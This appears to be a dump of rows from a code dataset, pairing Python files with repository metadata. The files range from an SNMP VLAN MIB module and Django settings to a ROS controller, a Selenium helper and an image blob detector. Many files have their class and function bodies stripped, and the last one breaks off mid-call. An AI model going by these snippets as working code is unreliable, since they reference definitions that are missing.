if mibBuilder.loadTexts: a3ComVlanIfGlobalIdentifier.setDescription('An administratively assigned global VLAN identifier. For VLAN interfaces, on different network devices, which are part of the same globally identified VLAN, the value of this object will be the same. The binding between a global identifier and a VLAN interface can be created or removed. To create a binding an NMS must write a non-zero value to this object. To delete a binding, the NMS must write a zero to this object.')
a3ComVlanIfInfo = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 5), OctetString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: a3ComVlanIfInfo.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfInfo.setDescription('A TLV encoded information string for the VLAN interface. The information contained within this string corresponds to VLAN information not contained within this table, but contained elsewhere within this MIB module. The purpose of this string is to provide an NMS with a quick read mechanism of all related VLAN interface information. The encoding rules are defined according to: tag = 2 bytes length = 2 bytes value = n bytes The following tags are defined: TAG OBJECT DESCRIPTION 1 a3ComIpVlanIpNetAddress IP Network Address of IP VLAN 2 a3ComIpVlanIpNetMask IP Network Mask of IP VLAN')
a3ComVlanIfStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 6), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanIfStatus.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfStatus.setDescription('The status column for this VLAN interface. This OBJECT can be set to: active(1) createAndGo(4) createAndWait(5) destroy(6) The following values may be read: active(1) notInService(2) notReady(3). Setting this object to createAndGo(4) causes the agent to attempt to create and commit the row based on the contents of the objects in the row. If all necessary information is present in the row and the values are acceptible to the agent, the agent will change the status to active(1). If any of the necessary objects are not available, the agent will reject the creation request. Setting this object to createAndWait(5) causes a row in in this table to be created. The agent sets the status to notInService(2) if all of the information is present in the row and the values are acceptible to the agent; otherwise, the agent sets the status to notReady(3). Setting this object to active(1) is only valid when the current status is active(1) or notInService(2). When the state of the row transitions to active(1), the agent creates the corresponding row in the ifTable.. Setting this object to destroy(6) will remove the corresponding VLAN interface, remove the entry in this table, and the corresponding entries in the a3ComVlanGlobalMappingTable and the ifTable. In order for a set of this object to destroy(6) to succeed, all dependencies on this row must have been removed. These will include any stacking dependencies in the ifStackTable and any protocol specific tables dependencies.')
a3ComVlanIfModeType = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 1, 2, 1, 7), A3ComVlanModeType()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanIfModeType.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanIfModeType.setDescription(' The VLAN mode type for this interface. This object can be set to: usedefault(1) open(2) closed(3) UseDefault Vlans: uses the bridge Vlan Mode value. The bridge Vlan Mode Value can be set to : Open, Closed or Mixed. Open VLANs: have no requirements about relationship between the bridge port that a frame was received upon and the bridge port(s) that it is transmitted on. All open VLANs within the bridge will share the same address table. Closed VLANs: require that the bridge port that a frame is received on is the same VLAN interface as the bridge port(s) that a frame is transmitted on. Each closed VLAN within the bridge will have its own address table.')
a3ComIpVlanTable = MibTable((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 1), )
if mibBuilder.loadTexts: a3ComIpVlanTable.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComIpVlanTable.setDescription('A list of IP VLAN interface information entries. Entries in this table are related to entries in the a3ComVlanIfTable by using the same index.')
a3ComIpVlanEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 1, 1), ).setIndexNames((0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanIfIndex"))
if mibBuilder.loadTexts: a3ComIpVlanEntry.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComIpVlanEntry.setDescription('A a3ComIpVlanEntry contains layer 3 information about a particular IP VLAN interface. Note entries in this table cannot be deleted until the entries in the ifStackTable that produce overlap are removed.')
a3ComIpVlanIpNetAddress = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 1, 1, 1), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComIpVlanIpNetAddress.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComIpVlanIpNetAddress.setDescription('The IP network number for the IP VLAN interface defined in the a3ComVlanIfTable identified with the same index. The IpNetAdress and the IpNetMask must be set and the the row creation process completed by a NMS before overlapping rows in the ifStackTable can be created. Sets to the ifStackTable that produce overlapping IP IP VLAN interfaces will fail if this object is not set.')
a3ComIpVlanIpNetMask = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 1, 1, 2), IpAddress()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComIpVlanIpNetMask.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComIpVlanIpNetMask.setDescription('The IP network mask corresponding to the IP Network address defined by a3ComIpVlanIpNetAddress. The IpNetAdress and the IpNetMask must be set and the row creation process completed by a NMS before overlapping rows in the ifStackTable can be created. Sets to the ifStackTable that produce overlapping IP VLAN interfaces will fail if this object is not set.')
a3ComIpVlanStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 1, 1, 3), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComIpVlanStatus.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComIpVlanStatus.setDescription('The status column for this IP VLAN entry. This object can be set to: active(1) createAndGo(4) createAndWait(5) destroy(6) The following values may be read: active(1) notInService(2) notReady(3). Setting this object to createAndGo(4) causes the agent to attempt to create and commit the row based on the contents of the objects in the row. If all necessary information is present in the row and the values are acceptible to the agent, the agent will change the status to active(1). If any of the necessary objects are not available, the agent will reject the row creation request. Setting this object to createAndWait(5) causes a row in in this table to be created. The agent sets the status to notInService(2) if all of the information is present in the row and the values are acceptible to the agent; otherwise, the agent sets the status to notReady(3). Setting this object to active(1) is only valid when the current status is active(1) or notInService(2). When the status changes to active(1), the agent applies the IP parmeters to the IP VLAN interface identified by the corresponding value of the a3ComIpVlanIndex object. Setting this object to destroy(6) will remove the IP parmeters from the IP VLAN interface and remove the entry from this table. Setting this object to destroy(6) will remove the layer 3 information from the IP VLAN interface and will remove the row from this table. Note that this action cannot be performed if there are ifStackTable entries that result in overlapping IP VLAN interfaces. Note that these dependencies must be removed first.')
a3ComVlanProtocolTable = MibTable((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 2), )
if mibBuilder.loadTexts: a3ComVlanProtocolTable.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanProtocolTable.setDescription('This table lists the configured protocols per Vlan. A single entry exists in this list for each protocol configured on a VLAN interface. The a3ComVlanIfType object in a3ComVlanIfTable has to be set to vlanLayeredProtocols in order to use this table.')
a3ComVlanProtocolEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 2, 1), ).setIndexNames((0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanProtocolIfIndex"), (0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanProtocolIndex"))
if mibBuilder.loadTexts: a3ComVlanProtocolEntry.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanProtocolEntry.setDescription('A a3ComVlanProtocolEntry contains a single VLAN to protocol entry.')
a3ComVlanProtocolIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 2, 1, 1), Integer32())
if mibBuilder.loadTexts: a3ComVlanProtocolIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanProtocolIfIndex.setDescription("The first indice of this row and the vlan's ifIndex in the ifTable. The value of this object is the same as the corresponding a3ComVlanIfIndex in the a3ComVlanTable.")
a3ComVlanProtocolIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 2, 1, 2), A3ComVlanLayer3Type())
if mibBuilder.loadTexts: a3ComVlanProtocolIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanProtocolIndex.setDescription('The second indice of this row, which identifies one of possible many protocols associated with the VLAN interface identified by this entries first indice. The values are based on the layer 3 protocols specified in A3ComVlanType')
a3ComVlanProtocolStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 2, 2, 1, 3), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanProtocolStatus.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanProtocolStatus.setDescription('The status column for this VLAN interface. This OBJECT can be set to: active(1) createAndGo(4) createAndWait(5) destroy(6) The following values may be read: active(1) notInService(2) notReady(3). Setting this object to createAndGo(4) causes the agent to attempt to create and commit the row based on the contents of the objects in the row. If all necessary information is present in the row and the values are acceptible to the agent, the agent will change the status to active(1). If any of the necessary objects are not available, the agent will reject the creation request. Setting this object to createAndWait(5) causes a row in this table to be created. The agent sets the status to notInService(2) if all of the information is present in the row and the values are acceptable to the agent; otherwise, the agent sets the status to notReady(3). Setting this object to active(1) is only valid when the current status is active(1) or notInService(2). Row creation to this table is only possible when a corresponding VLAN entry has been created in the a3ComVlanTable with an a3ComVlanType set to vlanLayeredProtocols(16). Setting this object to destroy(6) will remove the corresponding VLAN interface to protocol mapping.')
a3ComVlanEncapsIfTable = MibTable((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1), )
if mibBuilder.loadTexts: a3ComVlanEncapsIfTable.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfTable.setDescription('This table lists VLAN encapsulation interfaces that exist within a device. A single entry exists in this list for each VLAN encapsulation interface in the system. A VLAN encapsulation interface may be created or destroyed.')
a3ComVlanEncapsIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1, 1), ).setIndexNames((0, "GENERIC-3COM-VLAN-MIB-1-0-7", "a3ComVlanEncapsIfIndex"))
if mibBuilder.loadTexts: a3ComVlanEncapsIfEntry.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfEntry.setDescription('An individual VLAN encapsulation interface entry. When an NMS wishes to create a new entry in this table, it must obtain a non-zero index from the a3ComNextAvailableVirtIfIndex object. Row creation in this table will fail if the chosen index value does not match the current value returned from the a3ComNextAvailableVirtIfIndex object.')
a3ComVlanEncapsIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: a3ComVlanEncapsIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfIndex.setDescription("The index value of this row and the encapsulation interface's ifIndex in the ifTable. The NMS obtains the index value used for creating a row in this table by reading the a3ComNextAvailableVirtIfIndex object.")
a3ComVlanEncapsIfType = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1, 1, 2), A3ComVlanEncapsType()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanEncapsIfType.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfType.setDescription('The encapsulation algorithm used when encapsulating packets transmitted, or de-encapsulating packets received through this interface.')
a3ComVlanEncapsIfTag = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1, 1, 3), Integer32()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanEncapsIfTag.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfTag.setDescription('The tag used when encapsulating packets transmitted, or de-encapsulating packets received through this interface.')
a3ComVlanEncapsIfStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 4, 1, 1, 4), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: a3ComVlanEncapsIfStatus.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComVlanEncapsIfStatus.setDescription('The row status for this VLAN encapsulation interface. This OBJECT can be set to: active(1) createAndGo(4) createAndWait(5) destroy(6) The following values may be read: active(1) notReady(3). In order for a row to become active, the NMS must set a3ComVlanEncapsIfTagType and a3ComVlanEncapsIfTag to some valid and consistent values. Setting this object to createAndGo(4) causes the agent to attempt to create and commit the row based on the contents of the objects in the row. If all necessary information is present in the row, the agent will create the row and change the status to active(1). If any of the necessary objects are not available, or specify an invalid configuration, the row will not be created and the agent will return an appropriate error. Setting this object to createAndWait(5) causes a row in in this table to be created. If all necessary objects in the row have been assigned values and specify a valid configuration, the status of the row will be set to notInService(2); otherwise, the status will be set to notReady(3). This object may only be set to createAndGo(4) or createAndWait(5) if it does not exist. Setting this object to active(1) when the status is notInService(2) causes the agent to commit the row. Setting this object to active(1) when its value is already active(1) is a no-op. Setting this object to destroy(6) will remove the corresponding VLAN encapsulation interface, remote the entry in this table, and remove the corresponding entry in the ifTable. In order for a set of this object to destroy(6) to succeed, all dependencies on this row must have been removed. These will include any references to this interface in the ifStackTable.')
a3ComNextAvailableVirtIfIndex = MibScalar((1, 3, 6, 1, 4, 1, 43, 10, 1, 14, 3, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: a3ComNextAvailableVirtIfIndex.setStatus('mandatory')
if mibBuilder.loadTexts: a3ComNextAvailableVirtIfIndex.setDescription("The value of the next available virtual ifIndex. This object is used by an NMS to select an index value for row-creation in tables indexed by ifIndex. The current value of this object is changed to a new value when the current value is written to an agent's table, that is indexed by ifIndex. Row creation using the current value of this object, allocates a virtual ifIndex. Note the following: 1. A newly created row does not have to be active(1) for the agent to allocate the virtual ifIndex. 2. Race conditions between multiple NMS's end when a row is created. Rows are deemed created when a setRequest is successfully committed (i.e. the errorStats is noError(0)). 3. An agent that exhausts its supply of virual ifIndex values returns zero as the value of this object. This can be used by an NMS as an indication to deleted unused rows and reboot the device.")
mibBuilder.exportSymbols("GENERIC-3COM-VLAN-MIB-1-0-7", a3ComVlanEncapsIfStatus=a3ComVlanEncapsIfStatus, a3ComEncapsulationGroup=a3ComEncapsulationGroup, A3ComVlanLayer3Type=A3ComVlanLayer3Type, a3ComVlanIfTable=a3ComVlanIfTable, generic=generic, a3ComIpVlanTable=a3ComIpVlanTable, a3ComVlanIfModeType=a3ComVlanIfModeType, a3ComVlanProtocolTable=a3ComVlanProtocolTable, a3ComVirtualGroup=a3ComVirtualGroup, A3ComVlanType=A3ComVlanType, a3ComIpVlanIpNetMask=a3ComIpVlanIpNetMask, a3ComVlanGlobalMappingTable=a3ComVlanGlobalMappingTable, a3ComVlanEncapsIfIndex=a3ComVlanEncapsIfIndex, a3ComIpVlanIpNetAddress=a3ComIpVlanIpNetAddress, a3ComVlanProtocolIndex=a3ComVlanProtocolIndex, a3ComVlanGlobalMappingEntry=a3ComVlanGlobalMappingEntry, a3ComVlanEncapsIfTag=a3ComVlanEncapsIfTag, a3ComVlanIfIndex=a3ComVlanIfIndex, a3ComNextAvailableVirtIfIndex=a3ComNextAvailableVirtIfIndex, a3ComVlanIfDescr=a3ComVlanIfDescr, a3ComVlanIfStatus=a3ComVlanIfStatus, a3ComVlanGlobalMappingIfIndex=a3ComVlanGlobalMappingIfIndex, a3ComVlanEncapsIfEntry=a3ComVlanEncapsIfEntry, a3ComVlanEncapsIfTable=a3ComVlanEncapsIfTable, a3ComVlanIfGlobalIdentifier=a3ComVlanIfGlobalIdentifier, a3ComVlanIfInfo=a3ComVlanIfInfo, a3ComVlanProtocolIfIndex=a3ComVlanProtocolIfIndex, genVirtual=genVirtual, RowStatus=RowStatus, a3ComIpVlanEntry=a3ComIpVlanEntry, a3ComVlanIfEntry=a3ComVlanIfEntry, a3ComVlanProtocolEntry=a3ComVlanProtocolEntry, A3ComVlanModeType=A3ComVlanModeType, a3ComIpVlanStatus=a3ComIpVlanStatus, a3Com=a3Com, a3ComVlanGroup=a3ComVlanGroup, a3ComVlanEncapsIfType=a3ComVlanEncapsIfType, a3ComVlanProtocolStatus=a3ComVlanProtocolStatus, a3ComVlanIfType=a3ComVlanIfType, a3ComVlanProtocolsGroup=a3ComVlanProtocolsGroup, A3ComVlanEncapsType=A3ComVlanEncapsType, a3ComVlanGlobalMappingIdentifier=a3ComVlanGlobalMappingIdentifier, genExperimental=genExperimental)
| 200.691729 | 1,838 | 0.790536 |
775ee35015e7fb1a1d56468e759eea466f2753f3 | 388 | py | Python | uberlearner/main/api/authentication.py | Uberlearner/uberlearner | 421391c3c838bf8f88eed47646226fe8dc22d061 | [
"MIT"
] | 1 | 2020-10-17T04:41:47.000Z | 2020-10-17T04:41:47.000Z | uberlearner/main/api/authentication.py | Uberlearner/uberlearner | 421391c3c838bf8f88eed47646226fe8dc22d061 | [
"MIT"
] | null | null | null | uberlearner/main/api/authentication.py | Uberlearner/uberlearner | 421391c3c838bf8f88eed47646226fe8dc22d061 | [
"MIT"
] | null | null | null | from tastypie.authentication import SessionAuthentication | 35.272727 | 86 | 0.693299 |
91f204cefc1e11f78d143865718a0720e6b49302 | 135 | py | Python | libs/yowsup/yowsup/yowsup/layers/axolotl/__init__.py | akshitpradhan/TomHack | 837226e7b38de1140c19bc2d478eeb9e379ed1fd | [
"MIT"
] | 22 | 2017-07-14T20:01:17.000Z | 2022-03-08T14:22:39.000Z | libs/yowsup/yowsup/yowsup/layers/axolotl/__init__.py | akshitpradhan/TomHack | 837226e7b38de1140c19bc2d478eeb9e379ed1fd | [
"MIT"
] | 6 | 2017-07-14T21:03:50.000Z | 2021-06-10T19:08:32.000Z | libs/yowsup/yowsup/yowsup/layers/axolotl/__init__.py | akshitpradhan/TomHack | 837226e7b38de1140c19bc2d478eeb9e379ed1fd | [
"MIT"
] | 13 | 2017-07-14T20:13:14.000Z | 2020-11-12T08:06:05.000Z | from .layer_send import AxolotlSendLayer
from .layer_control import AxolotlControlLayer
from .layer_receive import AxolotlReceivelayer
| 33.75 | 46 | 0.888889 |
91f2badbe46ccc2afa070e8ea0d95aa258e9f159 | 3,199 | py | Python | accounts/models.py | MrEscape54/CRM | 36be1fcc74bbfddf343dc0b1b7f8af83be3fe8d3 | [
"MIT"
] | null | null | null | accounts/models.py | MrEscape54/CRM | 36be1fcc74bbfddf343dc0b1b7f8af83be3fe8d3 | [
"MIT"
] | null | null | null | accounts/models.py | MrEscape54/CRM | 36be1fcc74bbfddf343dc0b1b7f8af83be3fe8d3 | [
"MIT"
] | null | null | null | from django.db import models
from django.urls import reverse
from django.utils.translation import pgettext_lazy
from django.utils.translation import ugettext_lazy as _
from django.core.validators import RegexValidator
from core import utils
from core.models import User
from contacts.models import Contact
| 42.092105 | 140 | 0.736168 |
91f3e934e2bf21d69c8e84878b0f0bb1bc0e52af | 104 | py | Python | Courses/HSEPython/8 week/5.py | searayeah/sublime-snippets | deff53a06948691cd5e5d7dcfa85515ddd8fab0b | [
"MIT"
] | null | null | null | Courses/HSEPython/8 week/5.py | searayeah/sublime-snippets | deff53a06948691cd5e5d7dcfa85515ddd8fab0b | [
"MIT"
] | null | null | null | Courses/HSEPython/8 week/5.py | searayeah/sublime-snippets | deff53a06948691cd5e5d7dcfa85515ddd8fab0b | [
"MIT"
] | null | null | null | from functools import reduce
print(reduce(lambda x, y: x * (y**5), list(map(int, input().split())), 1))
| 34.666667 | 74 | 0.653846 |
91f411263bdba1a973d2748f05c7f918cdbad645 | 1,176 | py | Python | ros/src/twist_controller/twist_controller.py | SunshengGu/CarND-capstone-team-roboturtles | 6ceb896f5af095223910a8366b0747a4c0bba910 | [
"MIT"
] | null | null | null | ros/src/twist_controller/twist_controller.py | SunshengGu/CarND-capstone-team-roboturtles | 6ceb896f5af095223910a8366b0747a4c0bba910 | [
"MIT"
] | null | null | null | ros/src/twist_controller/twist_controller.py | SunshengGu/CarND-capstone-team-roboturtles | 6ceb896f5af095223910a8366b0747a4c0bba910 | [
"MIT"
] | 2 | 2019-02-05T02:55:57.000Z | 2019-02-10T20:12:41.000Z | from yaw_controller import YawController
from pid import PID
GAS_DENSITY = 2.858
ONE_MPH = 0.44704
| 25.021277 | 104 | 0.681973 |
91f45538afa3b794621cc7c469da195bbca2956a | 627 | py | Python | samples/cordic/cordic_golden.py | hj424/heterocl | e51b8f7f65ae6ad55c0c2426ab7192c3d8f6702b | [
"Apache-2.0"
] | 236 | 2019-05-19T01:48:11.000Z | 2022-03-31T09:03:54.000Z | samples/cordic/cordic_golden.py | hj424/heterocl | e51b8f7f65ae6ad55c0c2426ab7192c3d8f6702b | [
"Apache-2.0"
] | 248 | 2019-05-17T19:18:36.000Z | 2022-03-30T21:25:47.000Z | samples/cordic/cordic_golden.py | hj424/heterocl | e51b8f7f65ae6ad55c0c2426ab7192c3d8f6702b | [
"Apache-2.0"
] | 85 | 2019-05-17T20:09:27.000Z | 2022-02-28T20:19:00.000Z | import numpy as np
golden = np.array([
[100.0, 100.0],
[206.226840616, 179.610387213],
[1190.25124092, 1197.15702025],
[1250.76639667, 1250.3933971],
[1261.76760093, 1250.17718583],
[1237.4846285, 1237.56490579],
[1273.56730356, 1266.82141705],
[1272.899992, 1259.92589118],
[1.17000308922e-06, 1.21115462165e-06],
[4.69048419035e-08, 5.61093645301e-08],
[1.50244060584e-09, 2.44292250731e-09],
[8.47391624349e-11, 1.15593790738e-10],
[5.10649970307e-12, 4.80114236959e-12],
[8.34326950279e-13, 4.1368839091e-13],
[3.66142109259e-14, 4.95319932219e-14],
[8.20801944862e-15, 4.94154683061e-14]])
| 31.35 | 41 | 0.700159 |
91f4996456aabf6bbe1ac697a26d604a9883879d | 98 | py | Python | src/game_client/conf.py | adapiekarska/network-pong | c6a88b66570f26aea9c9976eb16953c480b846ec | [
"MIT"
] | 2 | 2018-11-14T17:25:24.000Z | 2019-12-09T17:57:30.000Z | src/game_client/conf.py | adapiekarska/network-pong | c6a88b66570f26aea9c9976eb16953c480b846ec | [
"MIT"
] | null | null | null | src/game_client/conf.py | adapiekarska/network-pong | c6a88b66570f26aea9c9976eb16953c480b846ec | [
"MIT"
] | null | null | null | """
User configuration file for the client.
"""
SERVER_ADDRESS = "127.0.0.1"
SERVER_PORT = 50000
| 14 | 39 | 0.704082 |
91f534930f8a5265738ba0e1d6c22b1ba0b55ac6 | 3,479 | py | Python | build/lib/Element/Element.py | sunnyyukaige/APP_automation_core | b53ad737025a1af44746ea5f1c9a4cbe65d7cfb4 | [
"MIT"
] | null | null | null | build/lib/Element/Element.py | sunnyyukaige/APP_automation_core | b53ad737025a1af44746ea5f1c9a4cbe65d7cfb4 | [
"MIT"
] | null | null | null | build/lib/Element/Element.py | sunnyyukaige/APP_automation_core | b53ad737025a1af44746ea5f1c9a4cbe65d7cfb4 | [
"MIT"
] | null | null | null | from selenium.common.exceptions import WebDriverException, NoSuchElementException
from Element.Waitor import Waitor
from Element.Find import Find
from Utilitys.WaitUtils import WaitUtils
| 32.514019 | 84 | 0.596148 |
91f55da34b50862c7008aa6fdd44283def33131b | 2,047 | py | Python | config/settings/prd.py | zhenghuihu/django-skeleton | 548019b2f5826593f2f270c96f8b14ec19280c51 | [
"MIT"
] | null | null | null | config/settings/prd.py | zhenghuihu/django-skeleton | 548019b2f5826593f2f270c96f8b14ec19280c51 | [
"MIT"
] | null | null | null | config/settings/prd.py | zhenghuihu/django-skeleton | 548019b2f5826593f2f270c96f8b14ec19280c51 | [
"MIT"
] | null | null | null | '''
production setting
'''
# include all base settings
from .base import * # pylint: disable=W0401,W0614
# include credentials (not included in repo)
from . import credentials as crd # pylint: disable=W0401,W0611
# disable debugging
DEBUG = False
# ========================
# SECRET_KEY
# https://docs.djangoproject.com/en/1.10/ref/settings/#std:setting-SECRET_KEY
# ========================
SECRET_KEY = crd.SECRET_KEY
# ========================
# STATIC_ROOT
# Collect static files here
# https://docs.djangoproject.com/en/1.10/ref/settings/#std:setting-STATIC_ROOT
# ========================
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'run', 'static')
# ========================
# Database override
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
# ========================
#DATABASES = {
# 'default': {
# }
#}
# ========================
# logging configuration
# https://docs.djangoproject.com/en/1.10/topics/logging/
# ========================
LOGGING = {
'version': 1,
'disable_existing_loggers': True,
'formatters': {
'verbose': {
'format': '%(levelname)-8s %(asctime)s %(module)-10s %(message)s',
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'filters': {
},
'handlers': {
'console':{
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'verbose'
},
'file': {
'level': 'INFO',
'class': 'logging.handlers.RotatingFileHandler',
'filename': os.path.join(PROJECT_ROOT, 'run', 'django.log'),
'maxBytes': 10*1000*1000, # 10M
'backupCount': 3,
'formatter': 'verbose',
},
},
'loggers': {
'': {
'handlers': ['file'],
'propagate': True,
'level': 'INFO',
},
'django': {
'handlers': ['file',],
'propagate': True,
'level': 'INFO',
},
},
}
| 25.911392 | 78 | 0.484123 |
91f69a518f7a745cba0d44a46ab85227b8ebc8dd | 636 | py | Python | 8. str_range/test_solution.py | dcragusa/WeeklyPythonExerciseB2 | a7da3830e27891060dcfb0804c81f52b1f250ce8 | [
"MIT"
] | null | null | null | 8. str_range/test_solution.py | dcragusa/WeeklyPythonExerciseB2 | a7da3830e27891060dcfb0804c81f52b1f250ce8 | [
"MIT"
] | null | null | null | 8. str_range/test_solution.py | dcragusa/WeeklyPythonExerciseB2 | a7da3830e27891060dcfb0804c81f52b1f250ce8 | [
"MIT"
] | null | null | null | from solution import str_range
test_same_start_end()
test_simple()
test_simple_with_step()
test_simple_with_negativestep()
test_hebrew()
| 18.171429 | 37 | 0.606918 |
91f6f8ff0e9840449fba337706ce6b583a980630 | 8,227 | py | Python | acs_test_suites/OTC/libs/pyunit/testlib/graphics/display_metrics_report_impl.py | wangji1/test-framework-and-suites-for-android | 59564f826f205fe7fab64f45b88b1a6dde6900af | [
"Apache-2.0"
] | 8 | 2018-09-14T01:34:01.000Z | 2021-07-01T02:00:23.000Z | acs_test_suites/OTC/libs/pyunit/testlib/graphics/display_metrics_report_impl.py | wangji1/test-framework-and-suites-for-android | 59564f826f205fe7fab64f45b88b1a6dde6900af | [
"Apache-2.0"
] | 3 | 2019-09-10T11:39:50.000Z | 2019-10-10T08:26:22.000Z | acs_test_suites/OTC/libs/pyunit/testlib/graphics/display_metrics_report_impl.py | wangji1/test-framework-and-suites-for-android | 59564f826f205fe7fab64f45b88b1a6dde6900af | [
"Apache-2.0"
] | 9 | 2018-10-11T15:14:03.000Z | 2021-02-17T11:37:20.000Z | '''
Copyright (C) 2018 Intel Corporation
?
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
?
http://www.apache.org/licenses/LICENSE-2.0
?
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions
and limitations under the License.
?
SPDX-License-Identifier: Apache-2.0
'''
import re
import math
import time
from testlib.util.common import g_common_obj
from testlib.graphics.common import window_info
d_metricsreport_impl = DisplayMetricsReportImpl()
| 41.550505 | 115 | 0.629999 |
91f92403a6d2b5956cbf468fe884187f6c555b2a | 3,811 | py | Python | Anchors/Find and Replace in Anchor Names.py | juandelperal/Glyphs-Scripts | 1f3cb71683ec044dff67a46cd895773e8271effa | [
"Apache-2.0"
] | null | null | null | Anchors/Find and Replace in Anchor Names.py | juandelperal/Glyphs-Scripts | 1f3cb71683ec044dff67a46cd895773e8271effa | [
"Apache-2.0"
] | null | null | null | Anchors/Find and Replace in Anchor Names.py | juandelperal/Glyphs-Scripts | 1f3cb71683ec044dff67a46cd895773e8271effa | [
"Apache-2.0"
] | null | null | null | #MenuTitle: Find And Replace In Anchor Names
# -*- coding: utf-8 -*-
from __future__ import division, print_function, unicode_literals
from builtins import str
__doc__="""
Replaces strings in anchor names of all selected glyphs.
"""
import vanilla
# brings macro window to front and clears its log:
Glyphs.clearLog()
Glyphs.showMacroWindow()
SearchAndReplaceInAnchorNames()
| 37.732673 | 140 | 0.724482 |
91fa4adf813afeff4ee8cff082ebb2bd99d4723f | 269 | py | Python | Python3/Coursera/003_quadratic_roots/solution.py | neon1ks/Study | 5d40171cf3bf5e8d3a95539e91f5afec54d1daf3 | [
"MIT"
] | null | null | null | Python3/Coursera/003_quadratic_roots/solution.py | neon1ks/Study | 5d40171cf3bf5e8d3a95539e91f5afec54d1daf3 | [
"MIT"
] | null | null | null | Python3/Coursera/003_quadratic_roots/solution.py | neon1ks/Study | 5d40171cf3bf5e8d3a95539e91f5afec54d1daf3 | [
"MIT"
] | null | null | null | import sys
import math
if __name__ == '__main__':
a = int(sys.argv[1])
b = int(sys.argv[2])
c = int(sys.argv[3])
d = b * b - 4 * a * c
x1 = (-b + math.sqrt(d)) / (2 * a)
x2 = (-b - math.sqrt(d)) / (2 * a)
print(int(x1))
print(int(x2))
| 19.214286 | 38 | 0.472119 |
91fb5d86e0a2ace17209d7b5be31f349a8d3fe5f | 2,258 | py | Python | bigstream/features.py | wangyuhan01/bigstream | 3cd2e4b217639d09b5e2dd0e169a7c210d9cacef | [
"MIT"
] | 14 | 2021-03-10T12:52:02.000Z | 2022-03-14T19:46:03.000Z | bigstream/features.py | wangyuhan01/bigstream | 3cd2e4b217639d09b5e2dd0e169a7c210d9cacef | [
"MIT"
] | 6 | 2021-02-24T18:15:34.000Z | 2021-12-08T16:58:06.000Z | bigstream/features.py | wangyuhan01/bigstream | 3cd2e4b217639d09b5e2dd0e169a7c210d9cacef | [
"MIT"
] | 6 | 2021-01-20T03:57:14.000Z | 2022-02-04T22:16:46.000Z | import numpy as np
from fishspot.filter import white_tophat
from fishspot.detect import detect_spots_log
def blob_detection(
image,
min_blob_radius,
max_blob_radius,
**kwargs,
):
"""
"""
wth = white_tophat(image, max_blob_radius)
spots = detect_spots_log(
wth,
min_blob_radius,
max_blob_radius,
